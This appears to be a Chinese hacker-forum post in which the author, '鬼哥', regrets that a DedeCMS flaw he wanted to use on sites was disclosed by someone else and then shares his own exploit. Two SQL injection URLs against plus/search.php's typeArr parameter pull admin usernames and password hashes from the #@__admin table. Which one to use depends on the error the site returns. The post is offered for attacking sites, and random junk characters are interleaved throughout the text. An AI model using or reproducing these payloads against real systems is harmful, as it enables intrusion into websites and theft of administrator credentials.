转载不加作者名的没JJ9 n8 o4 V' b9 q
" x9 u4 D Q" _+ R哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。5 g5 _4 h2 j6 |/ I% P' X+ q* j% N+ S
8 ^( ^+ ?: H2 h/ ~2 N. f
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
% Y: D$ g* H* Q- Z+ \' G2 J9 o' z4 T: q6 ]; L' P+ D! u! T* k
我一般是这样测试的:' @5 Y% l% R, U. u& l
$ T, |) c) k6 U) N* e, ~
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
9 c/ j+ p7 u/ @) c# z1 R1 C& P9 }6 i
转载不加作者名的没JJ1 u+ C% I {4 f) I r6 L+ E
, `3 A' C- Y; d+ Q7 q作者:鬼哥
0 v" m& p0 }* o/ ~- Y9 C+ e' u
, I2 b; ~$ d+ J4 L$ l 2 k4 E, Z; j; x% \
: Q/ Z# n; H6 M3 G. y# w看结果如果提示$ h9 d% t& F% O1 U0 A( ~# U
+ k* H/ ], |4 D. A" {) Z3 L" x% X
Safe Alert: Request Error step 2 !) B! ]# X% d5 |; {) S
5 @4 _) O* k. T5 o2 b: d8 `
那么直接用下面的exp
4 D$ c: F0 f- |3 I
2 Q4 S- a/ A' Wxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
; e* o: ~: G6 p9 B; I8 A4 S; A8 O4 |" i! J
$ Y' { t! _! m9 W0 i- B( s1 f/ `2 ]9 u看结果如果提示0 d7 F- T I9 ]
9 _$ r8 p6 t1 G5 u
Safe Alert: Request Error step 1 !
/ E8 R. c" `1 w( O
. t. _+ D* @+ T那么直接用下面的exp% g* n+ S9 M. R0 F# S# X
( P2 m3 }( ^9 m P7 `8 i" I
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a0 T' d+ W' l/ I, @" k: U
3 e* m# k$ X- H+ O& F( [+ n& W, s+ J4 y- d' u
如果正常显示证明漏洞不存在了。
3 N3 n) v! N' Q5 n. S/ r, g# W' Y" ~' y! c5 v! o) B
转载不加作者名的没JJ |